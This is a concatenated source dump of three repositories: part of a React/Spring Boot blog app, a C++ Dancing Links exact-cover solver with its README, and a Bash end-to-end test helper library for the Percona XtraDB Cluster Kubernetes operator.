data-msg="请输入用户名" className="input-material" onChange={this.handleNameChange}/> <label htmlFor="userAccount" className="label-material">账号</label> </div> <div className="form-group-material"> <input id="password" type="password" name="loginPassword" required data-msg="请输入密码" className="input-material" onChange={this.handlePasswordChange}/> <label htmlFor="password" className="label-material">密码</label> </div> <div className="form-group text-center"> <input type="submit" id="login" className="btn btn-primary" value="登录" onClick={this.handleSubmit}/> </div> </form> </div> ) } }<file_sep>/src/main/java/com/util/FileUtil.java package com.util; import java.io.*; public class FileUtil { } <file_sep>/blogs/src/component/common/CommonSider.jsx import {Layout, Menu} from "antd"; import React, {Component} from "react"; import {connect} from 'react-redux' const {Sider} = Layout; const {SubMenu} = Menu; /** * TODO: 数据库中存储每个用户的列表信息以及图标 */ export class CommonSider extends Component { constructor(props) { super(props); this.state = { collapsed: false, key: 0, }; } componentDidMount() { } // 是否折叠左边扩展栏 onCollapse = collapsed => { this.setState({collapsed}); }; // 构建左导航栏菜单 handleSiderMenuList = (siderMenuList) => { let menuList = []; let key = 0; siderMenuList.map((item) => { let menuItem = []; if (Array.isArray(item)) { item.map((subMenu) => { let subMenuKeys = Object.keys(subMenu); subMenuKeys.map((subMenuKey) => { let subMenuItems = []; subMenu[subMenuKey].map((subMenuItem) => { subMenuItems.push( <Menu.Item key={key++}>{subMenuItem}</Menu.Item> ); }) let menuItem = ( <SubMenu key={key++} title={subMenuKey}> {subMenuItems} </SubMenu>) menuList.push(menuItem); }) }) let subMenuName = item } else { menuItem = ( <Menu.Item key={key++}> {item} </Menu.Item> ) menuList.push(menuItem); } }) return menuList; } handleSubMenu = (content, key) => { return ( <Menu.Item key={key++}> {content} </Menu.Item> ) } handleMenuItem = () => { } render() { let siderData = this.props.siderData; return ( <Sider collapsible="true" collapsed={this.state.collapsed} onCollapse={this.onCollapse}> <div className="logo"/> <Menu theme="dark" defaultSelectedKeys={['1']} mode="inline"> <Menu.Item key="1"> 所有博客 </Menu.Item> <SubMenu key="sub1" title="分类"> <Menu.Item key="2">Java</Menu.Item> <Menu.Item key="3">Spring</Menu.Item> <Menu.Item key="4">React</Menu.Item> <Menu.Item key="5">数据库</Menu.Item> <Menu.Item key="6">算法</Menu.Item> <Menu.Item key="7">计算机网络</Menu.Item> </SubMenu> <Menu.Item key="8">个人信息</Menu.Item> </Menu> </Sider> ) } } const mapStateToProps = (state) => { return { siderMenuList: state.mainView.siderMenuList } } export default connect(mapStateToProps)(CommonSider); <file_sep>/blogs/src/container/Manager.jsx import {connect} from "react-redux"; import ManagerView from "../component/ManagerView"; import * as action from "../redux/actionCreater"; const mapStateToProps = (state) => { return { userData: state.mainView.userData, } } const mapDispatchToProps = (dispatch) => { return { login: (user) => dispatch(action.login(user)) } } export default connect(mapStateToProps, mapDispatchToProps)(ManagerView) <file_sep>/src/test/java/com/springboot_blog/base/Int2String.java package com.springboot_blog.base; import org.junit.Test; public class Int2String { @Test public void int2String () { String s = "ssss"; System.out.println (Integer.getInteger (s)); } } <file_sep>/src/test/java/com/springboot_blog/database/ArticleTest.java package com.springboot_blog.database; import com.dao.ArticleDao; import org.junit.runner.RunWith; import org.mybatis.spring.annotation.MapperScan; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.boot.test.context.SpringBootTest; import org.springframework.test.context.junit4.SpringRunner; @SpringBootTest @RunWith (SpringRunner.class) @MapperScan (basePackages = {"com.dao"}) public class ArticleTest { @Autowired ArticleDao articleDao; }
49391710b7e997571ed11a7e50ff2488bf4a0281
[ "JavaScript", "Java", "SQL" ]
21
JavaScript
zwbsdmpy/springboot_blogs
4f8521ea9bb737113eab77947cf5c693a9d99176
bae698b7047e5afc6e73e5cc1dc1a410dfd5d448
refs/heads/main
<repo_name>Logismos/dlx<file_sep>/example.cpp #include "dlx.h" #include <iostream> #include <random> #include <string> template<class T> using Matrix=std::vector<std::vector<T>>; template<class T> Matrix<T> gen_rand_matrix(size_t n) { Matrix<T> mat; for (size_t i = 0; i < n/2; ++i) { std::vector<T> row1; std::vector<T> row2; for (size_t j = 0; j < n; ++j) { float r = (float)rand() / (float)RAND_MAX; row1.push_back((T)((r > 0.5) ? 1 : 0)); row2.push_back((T)((row1[j] == 0) ? 1 : 0)); } mat.push_back(std::move(row1)); mat.push_back(std::move(row2)); } return mat; } std::vector<std::string> gen_column_names(size_t n) { std::vector<std::string> col_names; for (size_t i = 0; i < n; ++i) col_names.push_back(std::to_string(i)); return col_names; } int main() { using namespace std; srand(0); vector<string> column_names; column_names = {"A", "B", "C", "D", "E", "F", "G"}; vector<vector<bool> > test_matrix{{0, 0, 1, 0, 1, 1, 0}, {1, 0, 0, 1, 0, 0, 1}, {0, 1, 1, 0, 0, 1, 0}, {1, 0, 0, 1, 0, 0, 0}, {0, 1, 0, 0, 0, 0, 1}, {0, 0, 0, 1, 1, 0, 1}}; // You can also comment out the next three lines // size_t n = 10; // test_matrix = gen_rand_matrix<bool>(n); // column_names = gen_column_names(n); auto dlx = Dlx::DancingLinks(test_matrix); dlx.Search(); std::cout << "n solutions: " << dlx.SolutionCount() << '\n'; for (const auto& solution : dlx.GetSolutions()) { std::cout << "solution:\n"; auto decoded_solution = dlx.DecodeSolution(column_names, solution); for (auto& row : decoded_solution) { for (auto& s : row) { std::cout << s << " "; } std::cout << '\n'; } } return 0; } <file_sep>/memory_pool.h // Simple memory pool for dlx nodes #ifndef MEMORY_POOL_H #define MEMORY_POOL_H #include <vector> namespace Dlx { template<class T> class MemoryPool { public: MemoryPool() = default; MemoryPool(size_t n) { m_data.resize(n); } void Resize(size_t n) { m_data.resize(n); } T* New() { if (m_ptr < m_data.size()) return &m_data[m_ptr++]; else return nullptr; } private: std::vector<T> m_data; size_t m_ptr = 0; }; } // namespace #endif <file_sep>/README.md # Dancing Links (dlx) Exact cover solver using the dancing links (DLX) algorithm proposed by <NAME> [1]. Given a list of subsets over some __U__, an exact cover is a subset of these subsets, such that their union is equal to __U__, and each subset is disjoint from the other. The exact cover is also known as the independent set cover. Finding the exact cover is a NP complete problem, so no known polynomial-time solver exists. <NAME> detailed a simple and memory efficient way to find all exact covers for a problem represented as a binary matrix. The items to cover, or __U__, are represented by the columns in a binary matrix; each row represents a subset, with index _(i, j)_ set to true if row (subset) _i_ contains column (element) _j_. A solution is then a list of rows which satisfy the exact cover constraints (union equal to __U__, and all disjoint). See example.cpp for an example usage. # Optimizations - The circular linked lists are implemented so that the nodes all reside in a single chunk of memory (`std::vector`). This provides a bit of a speed up due to locality. - The solutions are represented as a list of indices indicating the rows, as opposed to a subset of the rows themselves. # References 1. https://arxiv.org/abs/cs/0011047 <file_sep>/Makefile example: g++ -std=c++2a example.cpp -o example clean: rm -f example .PHONY: clean <file_sep>/dlx.h // Dancing Links solver for the exact cover problem. // Finds subset of rows in a binary matrix such that each row is // disjoint, and whose union covers each column. #ifndef DLX_H #define DLX_H #include <algorithm> #include <iostream> #include <vector> #include "memory_pool.h" namespace Dlx { using Index=size_t; using BinaryMatrix=std::vector<std::vector<bool>>; class Node { public: Node* left; Node* right; Node* up; Node* down; Node* column; size_t size; // column size Index row_idx; // useful for generating solution // ctor Node() : left(this), right(this), up(this), down(this), column(this), size(0), row_idx(-1) {} }; class DancingLinks { public: using Row=size_t; using Solution=std::vector<Row>; public: // ctor DancingLinks(const BinaryMatrix& bin_mat) { if (bin_mat.size() == 0 or bin_mat[0].size() == 0) { // \todo throw error return; } size_t nrows = bin_mat.size(); size_t ncols = bin_mat[0].size(); // Determine how many nodes (nonzero entries in bin_mat) // Concurrently, determine which columns each row covers size_t node_count = 0; m_rows.reserve(nrows); for (size_t i = 0; i < nrows; ++i) { std::vector<size_t> row; for (size_t j = 0; j < ncols; ++j) { if (bin_mat[i][j]) { ++node_count; row.push_back(j); } } m_rows.push_back(std::move(row)); } // Initialize memory pool and root node m_pool.Resize(node_count + 1 /* for root */ + ncols); m_root = m_pool.New(); m_root->size = (size_t)(-1); // For keeping track of last node in column std::vector<Node*> prev_row(ncols); // Initialize column nodes Node* last_node = m_root; for (size_t j = 0; j < ncols; ++j) { Node* column_node = m_pool.New(); prev_row[j] = column_node; last_node->right = column_node; column_node->left = last_node; last_node = column_node; } last_node->right = m_root; m_root->left = last_node; // Construct a node for each nonzero element in binary matrix for (size_t i = 0; i < nrows; ++i) { Node* first_in_row = nullptr; Node* last_in_row = nullptr; for (size_t j : m_rows[i]) { Node* cur_node = m_pool.New(); cur_node->row_idx = i; // Up Node* up_node = prev_row[j]; prev_row[j] = cur_node; cur_node->up = up_node; up_node->down = cur_node; // Column Node* column_node = up_node->column; cur_node->column = column_node; ++column_node->size; // Left (if not the first seen in row thus far) if (last_in_row == nullptr) { first_in_row = cur_node; } else { cur_node->left = last_in_row; last_in_row->right = cur_node; } last_in_row = cur_node; } if (first_in_row != nullptr) { first_in_row->left = last_in_row; last_in_row->right = first_in_row; } } // Connect last nodes in columns to respective columns for (size_t j = 0; j < ncols; ++j) { Node* column_node = prev_row[j]->column; prev_row[j]->down = column_node; column_node->up = prev_row[j]; } } // Find all solutions and store in memory void Search() { Search_(0); } // Get all solutions const std::vector<Solution>& GetSolutions() const { return m_solutions;} // Return number of solutions const size_t SolutionCount() const { return m_solutions.size(); } const std::vector<size_t>& RowToColumns(size_t r) const { return m_rows.at(r);} const Solution& GetSolution(size_t idx) const { return m_solutions.at(idx);} // Helper function for converting a solution (subset of rows) to // whatever the user defines the covered columns to be template<class T> std::vector<std::vector<T>> DecodeSolution(const std::vector<T>& columns, const Solution& solution) const { std::vector<std::vector<T>> decoded_solution; for (size_t row : solution) { std::vector<T> decoded_row; const auto& cols = RowToColumns(row); for (size_t col : cols) { decoded_row.push_back(columns.at(col)); } decoded_solution.push_back(std::move(decoded_row)); } return decoded_solution; } private: /* dlx specific functions */ // cover column and remove conflicting rows void Cover(Node* col_node) { col_node->right->left = col_node->left; col_node->left->right = col_node->right; for (Node* i_node = col_node->down; i_node != col_node; i_node = i_node->down) { for (Node* j_node = i_node->right; j_node != i_node; j_node = j_node->right) { j_node->down->up = j_node->up; j_node->up->down = j_node->down; --col_node->size; } } } // undo effects of Cover() void Uncover(Node* col_node) { for (Node* i_node = col_node->up; i_node != col_node; i_node = i_node->up) { for (Node* j_node = i_node->left; j_node != i_node; j_node = j_node->left) { ++col_node->size; j_node->down->up = j_node; j_node->up->down = j_node; } } col_node->right->left = col_node; col_node->left->right = col_node; } // heuristic for choosing column Node* ChooseColumn() { Node* best_node = m_root; for (Node* col_node = m_root->right; col_node != m_root; col_node = col_node->right) { if (col_node->size < best_node->size) { best_node = col_node; } } return best_node; } // Recursively search for solutions void Search_(size_t k) { Node* col_node = ChooseColumn(); // Potential solution found if (col_node == m_root) { Solution solution; std::transform(m_cur_solution.begin(), m_cur_solution.begin() + k, std::back_inserter(solution), [](Node* r) -> Index { return r->row_idx;}); if (solution.size()) { m_solutions.push_back(std::move(solution)); } return; } Cover(col_node); for (Node* r_node = col_node->down; r_node != col_node; r_node = r_node->down) { if (k >= m_cur_solution.size()) { m_cur_solution.resize(k * 2 + 1); } m_cur_solution[k] = r_node; for (Node* c_node = r_node->right; c_node != r_node; c_node = c_node->right) { Cover(c_node->column); } Search_(k+1); // \todo These two lines necessary? r_node = m_cur_solution[k]; col_node = r_node->column; for (Node* c_node = r_node->left; c_node != r_node; c_node = c_node->left) { Uncover(c_node->column); } } Uncover(col_node); } /* Member variables */ MemoryPool<Node> m_pool; // For managing linked list memory Node* m_root; std::vector<Solution> m_solutions; // soltuions std::vector<Node*> m_cur_solution; // for building current solution std::vector<std::vector<size_t>> m_rows; // map from row to covered columns }; } // namespace #endif // DLX_H
e1ce543856f66d0e9039dbb5f89a4d4d0ec3df70
[ "Markdown", "Makefile", "C++" ]
5
C++
Logismos/dlx
d3dd4ee77624a66668c38a7aae7a0f15c8afa80a
61605292a5df32ba72ec3c65ae6cebb2cbf85648
refs/heads/master
<repo_name>bitsbeats/percona-xtradb-cluster-operator<file_sep>/e2e-tests/init-deploy/compare/monitor-80.sql GRANT SELECT, RELOAD, PROCESS, SUPER, REPLICATION CLIENT ON *.* TO `monitor`@`%` GRANT SELECT, UPDATE, DELETE, DROP ON `performance_schema`.* TO `monitor`@`%` <file_sep>/e2e-tests/functions #!/bin/bash exec 5>&2 BASH_XTRACEFD="5" GIT_COMMIT=$(git rev-parse HEAD) GIT_BRANCH=${VERSION:-$(git rev-parse --abbrev-ref HEAD | sed -e 's^/^-^g; s^[.]^-^g;' | tr '[:upper:]' '[:lower:]')} API="pxc.percona.com/v1-4-0" IMAGE=${IMAGE:-"perconalab/percona-xtradb-cluster-operator:${GIT_BRANCH}"} IMAGE_PXC=${IMAGE_PXC:-"perconalab/percona-xtradb-cluster-operator:master-pxc8.0"} IMAGE_PMM=${IMAGE_PMM:-"perconalab/percona-xtradb-cluster-operator:master-pmm"} IMAGE_PROXY=${IMAGE_PROXY:-"perconalab/percona-xtradb-cluster-operator:master-proxysql"} IMAGE_BACKUP=${IMAGE_BACKUP:-"perconalab/percona-xtradb-cluster-operator:master-pxc8.0-backup"} tmp_dir=$(mktemp -d) sed=$(which gsed || which sed) date=$(which gdate || which date) test_name=$(basename $test_dir) namespace="${test_name}-${RANDOM}" conf_dir=$(realpath $test_dir/../conf || :) src_dir=$(realpath $test_dir/../..) if oc projects 2>&1 | egrep -q 'You have access to the following projects|You are not a member of any projects|You have one project on this server'; then OPENSHIFT=1 fi HELM_VERSION=$(helm version -c | $sed -re 's/.*SemVer:"([^"]+)".*/\1/; s/.*\bVersion:"([^"]+)".*/\1/') if [ "${HELM_VERSION:0:2}" == "v2" ]; then HELM_ARGS="--name" fi wait_cluster_consistency() { cluster_name=$1 cluster_size=$2 sleep 7 # wait for two reconcile loops ;) 3 sec x 2 times + 1 sec = 7 seconds until [[ "$(kubectl_bin get pxc "${cluster_name}" -o jsonpath='{.status.state}')" == "ready" \ && "$(kubectl_bin get pxc "${cluster_name}" -o jsonpath='{.status.pxc.ready}')" == "${cluster_size}" \ && "$(kubectl_bin get pxc "${cluster_name}" -o jsonpath='{.status.proxysql.ready}')" == "${cluster_size}" ]]; do echo 'waiting for cluster readyness' sleep 20 done } create_namespace() { local namespace="$1" if [ "$OPENSHIFT" == 1 ]; then oc delete project "$namespace" && sleep 40 || : oc new-project "$namespace" oc project "$namespace" oc adm policy add-scc-to-user hostaccess -z default || : else kubectl_bin delete namespace "$namespace" || : wait_for_delete "namespace/$namespace" kubectl_bin create namespace "$namespace" kubectl_bin config set-context $(kubectl_bin config current-context) --namespace="$namespace" fi } get_operator_pod() { kubectl_bin get pods \ --selector=name=percona-xtradb-cluster-operator \ -o 'jsonpath={.items[].metadata.name}' } wait_pod() { local pod=$1 set +o xtrace retry=0 echo -n $pod #until kubectl_bin get pod/$pod -o jsonpath='{.status.phase}' 2>/dev/null | grep 'Running'; do until kubectl_bin get pod/$pod -o jsonpath='{.status.containerStatuses[0].ready}' 2>/dev/null | grep 'true'; do sleep 1 echo -n . let retry+=1 if [ $retry -ge 480 ]; then kubectl_bin describe pod/$pod kubectl_bin logs $pod kubectl_bin logs $(get_operator_pod) echo max retry count $retry reached. something went wrong with operator or kubernetes cluster exit 1 fi done set -o xtrace } wait_backup() { local backup=$1 set +o xtrace retry=0 echo -n $backup until kubectl_bin get pxc-backup/$backup -o jsonpath='{.status.state}' 2>/dev/null | grep 'Succeeded'; do sleep 1 echo -n . let retry+=1 if [ $retry -ge 60 ]; then kubectl_bin logs $(get_operator_pod) echo max retry count $retry reached. something went wrong with operator or kubernetes cluster exit 1 fi done set -o xtrace } wait_backup_restore() { local backup_name=$1 set +o xtrace retry=0 echo -n $backup_name until kubectl_bin get pxc-restore/$backup_name -o jsonpath='{.status.state}' 2>/dev/null | grep 'Succeeded'; do sleep 1 echo -n . let retry+=1 if [ $retry -ge 1500 ]; then kubectl_bin logs $(get_operator_pod) echo max retry count $retry reached. something went wrong with operator or kubernetes cluster exit 1 fi done echo set -o xtrace } deploy_operator() { desc 'start operator' kubectl_bin apply -f ${src_dir}/deploy/crd.yaml || : kubectl_bin apply -f ${src_dir}/deploy/rbac.yaml cat ${src_dir}/deploy/operator.yaml \ | sed -e "s^image: .*^image: ${IMAGE}^" \ | kubectl_bin apply -f - sleep 2 wait_pod $(get_operator_pod) } deploy_helm() { if [ "${HELM_VERSION:0:2}" == "v3" ]; then helm repo add stable https://kubernetes-charts.storage.googleapis.com/ helm repo update return 0 fi local namespace="$1" if [ "$OPENSHIFT" == 1 ]; then export TILLER_NAMESPACE=tiller oc new-project tiller || : oc project tiller oc process -f https://github.com/openshift/origin/raw/master/examples/helm/tiller-template.yaml -p TILLER_NAMESPACE="tiller" -p HELM_VERSION=$HELM_VERSION | oc apply -f - else kubectl_bin --namespace kube-system create sa tiller || : kubectl_bin create clusterrolebinding tiller --clusterrole cluster-admin --serviceaccount=kube-system:tiller || : helm init --service-account tiller kubectl_bin config set-context $(kubectl_bin config current-context) --namespace="kube-system" fi tiller_pod=$( kubectl_bin get pods \ --selector=name=tiller \ -o 'jsonpath={.items[].metadata.name}' ) wait_pod $tiller_pod if [ "$OPENSHIFT" == 1 ]; then oc project "$namespace" oc policy add-role-to-user edit "system:serviceaccount:tiller:tiller" else kubectl_bin config set-context $(kubectl_bin config current-context) --namespace="$namespace" fi } wait_for_running() { local name="$1" let last_pod="$(($2-1))" || : for i in $(seq 0 $last_pod); do wait_pod ${name}-${i} done } wait_for_delete() { local res="$1" set +o xtrace echo -n "$res - " retry=0 until (kubectl_bin get $res || :) 2>&1 | grep NotFound; do sleep 1 echo -n . let retry+=1 if [ $retry -ge 120 ]; then kubectl_bin logs $(get_operator_pod) echo max retry count $retry reached. something went wrong with operator or kubernetes cluster exit 1 fi done set -o xtrace } compare_kubectl() { local resource="$1" local postfix="$2" local expected_result=${test_dir}/compare/${resource//\//_}${postfix}.yml local new_result="${tmp_dir}/${resource//\//_}.yml" if [ "$OPENSHIFT" = 1 -a -f ${expected_result//.yml/-oc.yml} ]; then expected_result=${expected_result//.yml/-oc.yml} fi if [[ "$IMAGE_PXC" =~ 8\.0$ ]] && [ -f ${expected_result//.yml/-80.yml} ]; then expected_result=${expected_result//.yml/-80.yml} fi kubectl_bin get -o yaml ${resource} \ | egrep -v "namespace:|uid:|resourceVersion:|selfLink:|creationTimestamp:|.*: default-token-.*|deletionTimestamp:|image:|clusterIP:|dataSource:|procMount:" \ | egrep -v "^ storageClassName:|finalizers:|kubernetes.io/pvc-protection|volumeName:|storage-provisioner:|status: \{\}|volumeMode: Filesystem" \ | egrep -v "percona.com/.*-hash:|control-plane.alpha.kubernetes.io/leader:|volume.kubernetes.io/selected-node:" \ | egrep -v "healthCheckNodePort:|nodePort:|nodeName:" \ | $sed -e '/^status:$/,+100500d' \ | $sed -e '/NAMESPACE/,+1d' \ | $sed -e '/name: suffix/,+1d' \ | $sed -e '/name: S3_BUCKET_PATH/,+1d' \ | $sed -e '/name: S3_BUCKET_URL/,+1d' \ > ${new_result} diff -u ${expected_result} ${new_result} } get_client_pod() { kubectl_bin get pods \ --selector=name=pxc-client \ -o 'jsonpath={.items[].metadata.name}' } run_mysql() { local command="$1" local uri="$2" client_pod=$(get_client_pod) wait_pod $client_pod 1>&2 [[ ${-/x} != $- ]] && echo "+ kubectl exec -it $client_pod -- bash -c \"printf '$command\n' | mysql -sN $uri\"" >&$BASH_XTRACEFD set +o xtrace kubectl_bin exec $client_pod -- \ bash -c "printf '$command\n' | mysql -sN $uri" 2>&1 \ | sed -e 's/mysql: //' \ | (grep -v 'Using a password on the command line interface can be insecure.' || :) set -o xtrace } run_mysql_local() { local command="$1" local uri="$2" local pod="$3" [[ ${-/x} != $- ]] && echo "+ kubectl exec -it $pod -- bash -c \"printf '$command\n' | mysql -sN $uri\"" >&$BASH_XTRACEFD set +o xtrace kubectl_bin exec $pod -- \ bash -c "printf '$command\n' | mysql -sN $uri" 2>&1 \ | sed -e 's/mysql: //' \ | (egrep -v 'Using a password on the command line interface can be insecure.|Defaulting container name|see all of the containers in this pod' || :) set -o xtrace } compare_mysql_cmd() { local command_id="$1" local command="$2" local uri="$3" local postfix="$4" local expected_result=${test_dir}/compare/${command_id}${postfix}.sql if [[ "$IMAGE_PXC" =~ 8\.0$ ]] && [ -f ${test_dir}/compare/${command_id}${postfix}-80.sql ]; then expected_result=${test_dir}/compare/${command_id}${postfix}-80.sql fi run_mysql "$command" "$uri" \ > $tmp_dir/${command_id}.sql diff -u $expected_result $tmp_dir/${command_id}.sql } get_proxy_primary() { local uri="$1" local pod="$2" local ip=$(run_mysql_local 'SELECT hostname FROM runtime_mysql_servers WHERE hostgroup_id=11 AND status="ONLINE";' "$uri" "$pod") while [ $(echo "$ip" | wc -l) != 1 ]; do sleep 1 ip=$(run_mysql_local 'SELECT hostname FROM runtime_mysql_servers WHERE hostgroup_id=11 AND status="ONLINE";' "$uri" "$pod") done if [[ "$IMAGE_PXC" =~ 8\.0$ ]] ; then echo $ip | cut -d'.' -f1 else get_pod_name "$ip" fi } get_pod_name() { local ip=$1 kubectl_bin get pods -o json | jq -r '.items[] | select(.status.podIP == "'$ip'") | .metadata.name' } get_pod_ip() { local name=$1 kubectl_bin get pods -o json | jq -r '.items[] | select(.metadata.name == "'$name'") | .status.podIP' } compare_mysql_user(){ local uri="$1" local postfix="$2" local user=$(echo $uri | sed -e 's/.*-u//; s/ .*//') local expected_result=${test_dir}/compare/$user$postfix.sql if [[ "$IMAGE_PXC" =~ 8\.0$ ]] && [ -f ${test_dir}/compare/$user$postfix-80.sql ]; then expected_result=${test_dir}/compare/$user$postfix-80.sql fi (run_mysql "SHOW GRANTS;" "$uri" || :) \ | sed -e "s/'10[.][0-9][^']*'//; s/'[^']*[.]internal'//" \ > $tmp_dir/$user.sql diff -u $expected_result $tmp_dir/$user.sql } compare_mysql_user_local(){ local uri="$1" local pod="$2" local postfix="$3" local user=$(echo $uri | sed -e 's/.*-u//; s/ .*//') local expected_result=$test_dir/compare/$user$postfix.sql if [[ "$IMAGE_PXC" =~ 8\.0$ ]] && [ -f ${test_dir}/compare/$user$postfix-80.sql ]; then expected_result=${test_dir}/compare/$user$postfix-80.sql fi (run_mysql_local "SHOW GRANTS;" "$uri" "$pod" || :) \ | sed -e "s/'10[.][0-9][^']*'//; s/'[^']*[.]internal'//" \ > $tmp_dir/$user.sql diff -u $expected_result $tmp_dir/$user.sql } get_pumba() { kubectl_bin get pods \ --selector=name=pumba \ -o 'jsonpath={.items[].metadata.name}' } run_pumba() { local cmd="$*" kubectl_bin exec -it "$(get_pumba)" -- /pumba -l info ${cmd} } deploy_cert_manager() { kubectl_bin create namespace cert-manager || : kubectl_bin label namespace cert-manager certmanager.k8s.io/disable-validation=true || : kubectl_bin apply -f https://github.com/jetstack/cert-manager/releases/download/v0.10.1/cert-manager.yaml --validate=false || : 2>/dev/null } destroy() { local namespace="$1" kubectl_bin logs $(get_operator_pod) \ | grep -v '"level":"info"' \ | grep -v 'the object has been modified' \ | grep -v 'get backup status: Job.batch' \ | $sed -r 's/"ts":[0-9.]+//; s^limits-[0-9.]+/^^g' \ | sort -u \ | tee $tmp_dir/operator.log #TODO: maybe will be enabled later #diff $test_dir/compare/operator.log $tmp_dir/operator.log kubectl_bin delete pxc --all kubectl_bin delete pxc-backup --all kubectl_bin delete pxc-restore --all || : kubectl_bin delete -f https://github.com/jetstack/cert-manager/releases/download/v0.10.1/cert-manager.yaml 2>/dev/null || : if [ "$OPENSHIFT" == 1 ]; then oc delete --grace-period=0 --force=true project "$namespace" else kubectl_bin delete --grace-period=0 --force=true namespace "$namespace" fi rm -rf ${tmp_dir} } desc() { set +o xtrace local msg="$@" printf "\n\n-----------------------------------------------------------------------------------\n" printf "$msg" printf "\n-----------------------------------------------------------------------------------\n\n" set -o xtrace } get_service_endpoint() { local service=$1 local hostname=$( kubectl_bin get service/$service -o json \ | jq '.status.loadBalancer.ingress[].hostname' \ | sed -e 's/^"//; s/"$//;' ) if [ -n "$hostname" -a "$hostname" != "null" ]; then echo $hostname return fi local ip=$( kubectl_bin get service/$service -o json \ | jq '.status.loadBalancer.ingress[].ip' \ | sed -e 's/^"//; s/"$//;' ) if [ -n "$ip" -a "$ip" != "null" ]; then echo $ip return fi exit 1 } get_metric_values() { local metric=$1 local instance=$2 local user_pass=$3 local start=$($date -u "+%s" -d "-1 minute") local end=$($date -u "+%s") local endpoint=$(get_service_endpoint monitoring-service) curl -s -k "https://${user_pass}@$endpoint/graph/api/datasources/proxy/1/api/v1/query_range?query=$metric%7bcontainer_name%3d%22$instance%22%7d%20or%20$metric%7binstance%3d%22$instance%22%7d&start=$start&end=$end&step=60" \ | jq '.data.result[0].values[][1]' \ | grep '^"[0-9]' } get_qan_values() { local instance=$1 local start=$($date -u "+%Y-%m-%dT%H:%M:%S" -d "-30 minute") local end=$($date -u "+%Y-%m-%dT%H:%M:%S") local endpoint=$(get_service_endpoint monitoring-service) local uuid=$( curl -s -k "https://$endpoint/qan-api/instances?deleted=no" \ | jq '.[] | select(.Subsystem == "mysql" and .Name == "'$instance'") | .UUID' \ | sed -e 's/^"//; s/"$//;' ) curl -s -k "https://$endpoint/qan-api/qan/profile/$uuid?begin=$start&end=$end&offset=0" \ | jq '.Query[].Fingerprint' } get_qan20_values() { local instance=$1 local user_pass=$2 local start=$($date -u "+%Y-%m-%dT%H:%M:%S" -d "-30 minute") local end=$($date -u "+%Y-%m-%dT%H:%M:%S") local endpoint=$(get_service_endpoint monitoring-service) cat > payload.json << EOF { "columns":[ "load", "num_queries", "query_time" ], "first_seen": false, "group_by": "queryid", "include_only_fields": [], "keyword": "", "labels": [ { "key": "cluster", "value": ["pxc"] }], "limit": 10, "offset": 0, "order_by": "-load", "main_metric": "load", "period_start_from": "$($date -u -d '-12 hour' '+%Y-%m-%dT%H:%M:%S%:z')", "period_start_to": "$($date -u '+%Y-%m-%dT%H:%M:%S%:z')" } EOF curl -s -k -XPOST -d @payload.json "https://${user_pass}@$endpoint/v0/qan/GetReport" \ | jq '.rows[].fingerprint' rm -f payload.json } cat_config() { cat "$1" \ | $sed -e "s#apiVersion: pxc.percona.com/v.*\$#apiVersion: $API#" \ | $sed -e "s#image:.*-pxc\$#image: $IMAGE_PXC#" \ | $sed -e "s#image:.*-pmm\$#image: $IMAGE_PMM#" \ | $sed -e "s#image:.*-backup\$#image: $IMAGE_BACKUP#" \ | $sed -e "s#image:.*-proxysql\$#image: $IMAGE_PROXY#" } apply_config() { cat_config "$1" \ | kubectl_bin apply -f - } spinup_pxc() { local cluster=$1 local config=$2 local size="${3:-3}" local sleep="${4:-10}" desc 'create first PXC cluster' kubectl_bin apply \ -f $conf_dir/secrets.yml apply_config "$conf_dir/client.yml" apply_config "$config" desc 'check if all 3 Pods started' wait_for_running "$cluster-proxysql" 1 wait_for_running "$cluster-pxc" "$size" sleep $sleep desc 'write data' run_mysql \ 'CREATE DATABASE IF NOT EXISTS myApp; use myApp; CREATE TABLE IF NOT EXISTS myApp (id int PRIMARY KEY);' \ "-h $cluster-proxysql -uroot -proot_password" run_mysql \ 'INSERT myApp.myApp (id) VALUES (100500)' \ "-h $cluster-proxysql -uroot -proot_password" for i in $(seq 0 $(($size-1))); do compare_mysql_cmd "select-1" "SELECT * from myApp.myApp;" "-h $cluster-pxc-$i.$cluster-pxc -uroot -proot_password" done } kubectl_bin() { local LAST_OUT="$(mktemp)" local LAST_ERR="$(mktemp)" local exit_status=0 for i in $(seq 0 2); do kubectl "$@" 1>"$LAST_OUT" 2>"$LAST_ERR" exit_status=$? [[ ${-/x} != $- ]] && echo "--- $i stdout" | cat - "$LAST_OUT" >&$BASH_XTRACEFD [[ ${-/x} != $- ]] && echo "--- $i stderr" | cat - "$LAST_ERR" >&$BASH_XTRACEFD if [[ ${exit_status} != 0 ]]; then sleep "$((timeout * i))" else cat "$LAST_OUT" cat "$LAST_ERR" >&2 rm "$LAST_OUT" "$LAST_ERR" return ${exit_status} fi done cat "$LAST_OUT" cat "$LAST_ERR" >&2 rm "$LAST_OUT" "$LAST_ERR" return ${exit_status} } retry() { local max=$1 local delay=$2 shift 2 # cut delay and max args local n=1 until "$@"; do if [[ $n -ge $max ]]; then echo "The command '$@' has failed after $n attempts." exit 1 fi ((n++)) sleep $delay done } start_minio() { deploy_helm $namespace desc 'install Minio' helm del --purge minio-service || : retry 10 60 helm install \ $HELM_ARGS \ minio-service \ --set accessKey=some-access-key \ --set secretKey=some-secret-key \ --set service.type=ClusterIP \ --set configPath=/tmp/.minio/ \ --set persistence.size=2G \ --set environment.MINIO_REGION=us-east-1 \ --set environment.MINIO_HTTP_TRACE=/tmp/trace.log \ stable/minio MINIO_POD=$(kubectl_bin get pods --selector=release=minio-service -o 'jsonpath={.items[].metadata.name}') wait_pod $MINIO_POD kubectl_bin run -i --rm aws-cli --image=perconalab/awscli --restart=Never -- \ /usr/bin/env AWS_ACCESS_KEY_ID=some-access-key AWS_SECRET_ACCESS_KEY=some-secret-key AWS_DEFAULT_REGION=us-east-1 \ /usr/bin/aws --endpoint-url http://minio-service:9000 s3 mb s3://operator-testing }
1580b8fe1c86ac69b2bbabdf7a223c8ad9f9b837
[ "SQL", "Shell" ]
2
SQL
bitsbeats/percona-xtradb-cluster-operator
8493f540fc904238c2ffcd5dc8219926060a85b7
73b64f3f047180e3596e0cb192b024e2ff13f285
refs/heads/master
